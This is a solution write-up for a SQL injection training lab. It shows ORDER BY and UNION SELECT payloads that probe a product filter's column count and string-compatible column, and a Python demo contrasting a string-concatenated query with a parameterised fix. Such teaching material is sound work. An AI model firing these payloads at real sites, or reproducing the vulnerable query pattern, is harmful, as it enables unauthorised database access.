INFO LAB:

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you first need to determine the number of columns returned by the query. You can do this using the technique from the previous lab (SQL injection UNION attack, determining the number of columns returned by the query). The next step is to identify a column that is compatible with string data.

The lab will provide a random value that you need to make appear within the query results.

GOAL: To solve the lab, perform a SQL injection UNION attack that returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data.


Solution:

First we need to know how many columns the query returns.

' ORDER BY 1,2,3--    > 200 OK
' ORDER BY 4--        > 500 Internal Server Error

With three columns confirmed, we check that a UNION with three NULL values is accepted:

' UNION SELECT NULL,NULL,NULL--            > 200 OK

The difference between this lab and the previous one is the next step:

We need to returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data.

It only depends on which column we put the string in: we replace one NULL at a time with a string value and watch the response code.

' UNION SELECT 'hacker',NULL,NULL--           > 500 Internal Server Error
' UNION SELECT NULL,'hacker',NULL--           > 200 OK
' UNION SELECT NULL,NULL,'hacker'--           > 500 Internal Server Error

The lab requires us to replace the word 'hacker' with UJ3drF, placed in the second column (the only one that accepted a string).

Every lab instance provides a different word; in this instance it was UJ3drF.
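To show why the probes above work and how the category filter should have been written, here is an added example (not the lab's code; the products table, its column names and rows are constructed assumptions). It builds the filter query by string concatenation, runs the writeup's ORDER BY and UNION probes against it, and contrasts it with a parameterised version of the same query. SQLite is loosely typed, so it reproduces the extra 'hacker' row and the ORDER BY error, but not the lab's 500 on the two non-string columns, which comes from the backend's stricter type checking.

```python
import sqlite3


def make_db():
    # Constructed sample table standing in for the lab's product list.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER, name TEXT, price INTEGER, category TEXT)"
    )
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?, ?)",
        [(1, "Gift Box", 10, "Gifts"), (2, "Dog Toy", 20, "Pets")],
    )
    return conn


def vulnerable_filter(conn, category):
    # Vulnerable pattern: the category value is pasted into the SQL text, so a
    # quote plus ORDER BY / UNION changes the query itself. Returns (rows, error).
    sql = "SELECT id, name, price FROM products WHERE category = '" + category + "'"
    try:
        return conn.execute(sql).fetchall(), None
    except sqlite3.OperationalError as exc:
        return None, str(exc)  # the lab surfaces this as a 500 response


def safe_filter(conn, category):
    # Fixed pattern: the value is bound as a parameter, so the whole payload is
    # compared literally against the category column and never parsed as SQL.
    sql = "SELECT id, name, price FROM products WHERE category = ?"
    return conn.execute(sql, (category,)).fetchall()


UNION_PAYLOAD = "' UNION SELECT NULL,'hacker',NULL--"  # the probe from the writeup


def demo():
    conn = make_db()
    return {
        "order_by_3": vulnerable_filter(conn, "' ORDER BY 3--"),   # accepted
        "order_by_4": vulnerable_filter(conn, "' ORDER BY 4--"),   # DB error
        "vuln_union": vulnerable_filter(conn, UNION_PAYLOAD),      # extra row
        "safe_union": safe_filter(conn, UNION_PAYLOAD),            # no match
        "safe_normal": safe_filter(conn, "Gifts"),                 # normal use
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, "->", result)
```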


🎉 Congrats! You’ve solved the lab! 🎉